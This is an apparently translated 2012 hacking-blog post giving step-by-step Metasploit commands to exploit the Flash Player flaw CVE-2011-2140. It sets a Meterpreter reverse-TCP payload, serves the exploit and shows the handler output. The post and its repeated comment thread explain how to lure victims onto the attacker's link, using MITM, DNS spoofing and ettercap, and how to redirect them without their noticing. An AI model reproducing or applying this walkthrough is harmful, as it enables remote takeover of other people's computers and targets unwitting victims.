ClsHack:Computer Security Blog    

[CVE-2011-2140 && Metasploit]Remote code Execution Flash Player

Posted on: 10 February 2012

New module added to metasploit :D that exploits bugs in a further Flash Player.

Vulnerability indicated by the CVE-2011-2140, Here are the details:

Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

Let's see how to use Metasploit :D

The first thing to do is update Metasploit:
sudo msfupdate

Now we start Metasploit:
sudo msfconsole

We use the exploit:
use exploit/windows/browser/adobe_flash_sps

Commands are always those :D
We set the payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Configure the payload:
set LHOST MY_IP
Configure the exploit:
set URIPATH /

Now we set the player SWF, I took from the poc abysssec:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf

We start the exploit:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >

Have fun :D

We send our victim on our ip:PORT , e TREE :D

Related posts:

  1. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  2. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  3. [CVE:2011-4862] Remote Root FreeBSD
  4. [CVE-2011-3544]Metasploit: Java Remote untrusted Java Web Start
  5. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

This entry was posted on Friday, February 10th, 2012 at 9:39 am and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • Salzo

    hello But this exploit work remotely?

    • Ac1d

      Excuse me as part of Remote Code Execution you do not understand?

  • Salzo

    hello But this exploit work remotely?

    • Ac1d

      Excuse me as part of Remote Code Execution you do not understand?

  • Anonymous

    But it is a client-side exploits must pass the link to the victim ;) 
    For example with an attack http://www.clshack.com/?s=mitm

    • Simone formats

      so of course I have to enter the victim's browser on my ip with the port ?
      attack some’ senseless :-D

      • Anonymous

        If you are in the local network, or you can do a MITM attack can exploit some of the different sites xss, and so on… is foolish :D 

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          if you should also run a local dns spoof…or wrong?

          • Anonymous

            You can make a simple spoof ;) 

        • Simone formats

          well I will of course, but you always have to tell the victim to enter the link to that address with port! to make it work…
          :-D

  • ClsHackBlog

    But it is a client-side exploits must pass the link to the victim ;) 
    For example with an attack http://www.clshack.com/?s=mitm

    • Simone formats

      so of course I have to enter the victim's browser on my ip with the port ?
      attack some’ senseless :-D

      • ClsHackBlog

        If you are in the local network, or you can do a MITM attack can exploit some of the different sites xss, and so on… is foolish :D 

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          if you should also run a local dns spoof…or wrong?

          • ClsHackBlog

            You can make a simple spoof ;) 

        • Simone formats

          well I will of course, but you always have to tell the victim to enter the link to that address with port! to make it work…
          :-D

  • Zigfried Zorba

    This exploit didnt work with windows xp sp3..

    • Anonymous

      Try update :)

  • Zigfried Zorba

    This exploit didnt work with windows xp sp3..

    • ClsHackBlog

      Try update :)

  • zacky

    But now the modern routers stop MITM attacks and block the connection to the victim (I happen with vodafone station for example) you can do to get around this thing?

    • Anonymous

      If you are not local if you're remotely you must find another way to make the victim rendirect nattato your ip to the outside :) 

      • zacky

        sisi mean it locally .. using ettercap sometimes because of the internal protection of some routers (at least I think) the attack is not successful and the victim's traffic is blocked and no longer able to navigate!! What you can do in these cases?

        • Anonymous

          understand the problem sometimes is a problem in ettercap :D 

          I use to make scapy MITM and you find something here on the blog ;)Otherwise send the link to the victim :D 

          • zacky

            So I guess it's time to try and installaro hehe ;)

          • zacky

            tried but no way is my vodafone station sgama the mac and I duplicated blocks traffic :S

  • zacky

    But now the modern routers stop MITM attacks and block the connection to the victim (I happen with vodafone station for example) you can do to get around this thing?

    • ClsHackBlog

      If you are not local if you're remotely you must find another way to make the victim rendirect nattato your ip to the outside :) 

      • zacky

        sisi mean it locally .. using ettercap sometimes because of the internal protection of some routers (at least I think) the attack is not successful and the victim's traffic is blocked and no longer able to navigate!! What you can do in these cases?

        • ClsHackBlog

          understand the problem sometimes is a problem in ettercap :D 

          I use to make scapy MITM and you find something here on the blog ;)Otherwise send the link to the victim :D 

          • zacky

            So I guess it's time to try and installaro hehe ;)

          • zacky

            tried but no way is my vodafone station sgama the mac and I duplicated blocks traffic :S

  • Unknownita

    I have a question, but if I make a dsnspoof such as changing the dns in the router by redirecting the victim's PC infected on the address. Then after no worse? because the user will type it every time http://www.google.it end of the infected site? there is a more transparent?that certainly will understand that something is wrong..

    • Unknownita

      Perhaps a solution could be to direct it towards my blank page which then redirects the second tot after the actual site?

  • Unknownita

    I have a question, but if I make a dsnspoof such as changing the dns in the router by redirecting the victim's PC infected on the address. Then after no worse? because the user will type it every time http://www.google.it end of the infected site? there is a more transparent?that certainly will understand that something is wrong..

    • Unknownita

      Perhaps a solution could be to direct it towards my blank page which then redirects the second tot after the actual site?